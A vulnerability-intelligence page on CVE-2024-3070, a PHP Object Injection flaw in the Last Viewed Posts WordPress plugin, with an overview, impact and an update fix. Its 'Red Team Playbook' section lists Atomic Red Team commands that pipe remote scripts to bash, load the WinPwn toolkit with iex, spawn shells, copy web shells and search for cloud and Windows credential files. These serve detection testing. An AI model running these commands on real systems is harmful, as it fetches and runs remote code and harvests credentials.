CVE-2024-3070
Overview
This vulnerability is a PHP Object Injection caused by unsafe deserialization of untrusted input within the Last Viewed Posts by WPBeginner WordPress plugin. The flaw resides in the handling of the LastViewedPosts cookie, where serialized PHP objects are deserialized without validation. All plugin versions up to and including 1.0.0 are affected, specifically the component responsible for processing cookie data.
Vulnerability Description
The Last Viewed Posts by WPBeginner plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.0 via deserialization of untrusted input from the LastViewedPosts Cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
Impact
An unauthenticated attacker can exploit this vulnerability remotely by sending a crafted LastViewedPosts cookie, enabling PHP Object Injection. If combined with a POP chain from other installed plugins or themes, this can lead to arbitrary file deletion, data exposure, or remote code execution. The attack requires no user interaction or authentication and can be executed over the network, as reflected by the CVSS vector AV:N/AC:L/PR:N/UI:N, indicating high impact on confidentiality, integrity, and availability.
Solution
Users should upgrade the Last Viewed Posts by WPBeginner plugin to a version later than 1.0.0 where the deserialization flaw is addressed. Detailed patch instructions and version updates are available at the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/b6c5cc05-b147-46f6-aaa9-4c82aae1b544). No official workaround is documented; therefore, prompt updating is recommended to mitigate exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with the Last Viewed Posts plugin for WordPress is rooted in a critical flaw related to PHP Object Injection, which arises from the deserialization of untrusted input. This weakness exists in all versions up to and including 1.0.0. The core issue lies in the handling of the LastViewedPosts Cookie, where the plugin fails to adequately validate or sanitize the data being deserialized. This oversight allows an attacker to craft a malicious payload that, when processed by the plugin, can result in the injection of arbitrary PHP objects into the application’s runtime environment. Such a scenario can lead to severe consequences, particularly if the application or its environment is susceptible to further exploitation through a PHP Object Injection (POI) chain.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting unauthenticated users. An attacker can manipulate the LastViewedPosts Cookie to include a crafted payload that the plugin will deserialize upon subsequent requests. Once the malicious object is injected, the attacker may leverage the capabilities of the PHP environment to execute arbitrary code, delete files, or extract sensitive information. The potential for exploitation increases significantly if other plugins or themes installed on the WordPress site possess their own vulnerabilities that can be chained together with the initial attack. This interconnectedness of plugins and themes in the WordPress ecosystem creates a fertile ground for sophisticated attacks, where a single vulnerability can serve as a stepping stone to broader system compromise.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on WordPress for their online presence. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to severe data breaches, loss of sensitive customer information, or unauthorized access to administrative functionalities. For organizations, the repercussions may include reputational damage, financial losses due to remediation efforts, and potential legal liabilities stemming from data protection regulations. Moreover, the ability for an attacker to execute arbitrary code could lead to the deployment of malware, further exacerbating the situation and potentially impacting the broader user base of the affected site.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating all plugins and themes to their latest versions is crucial, as developers often release patches to address known vulnerabilities. Additionally, implementing a Web Application Firewall (WAF) can help filter out malicious requests and provide an additional layer of security against exploitation attempts. Conducting thorough security audits and penetration testing can also aid in identifying and remediating vulnerabilities before they can be exploited. Furthermore, developers should prioritize secure coding practices, including proper validation and sanitization of user inputs, to prevent similar vulnerabilities from arising in the future.
In conclusion, the PHP Object Injection vulnerability in the Last Viewed Posts plugin for WordPress poses a significant threat to the security of affected installations. The ease of exploitation combined with the potential for severe consequences underscores the importance of proactive security measures. By staying informed about vulnerabilities, applying timely updates, and adopting robust security practices, organizations can better protect themselves against the risks associated with such vulnerabilities and maintain the integrity of their online platforms.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-586 | Object Injection |
63%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-3070 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/b6c5cc05-b147-46f6-aaa9-4c82aae1b544?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3062246%40last-viewed-posts&new=3062246%40last-viewed-posts&sfp_email=&sfph_mail= |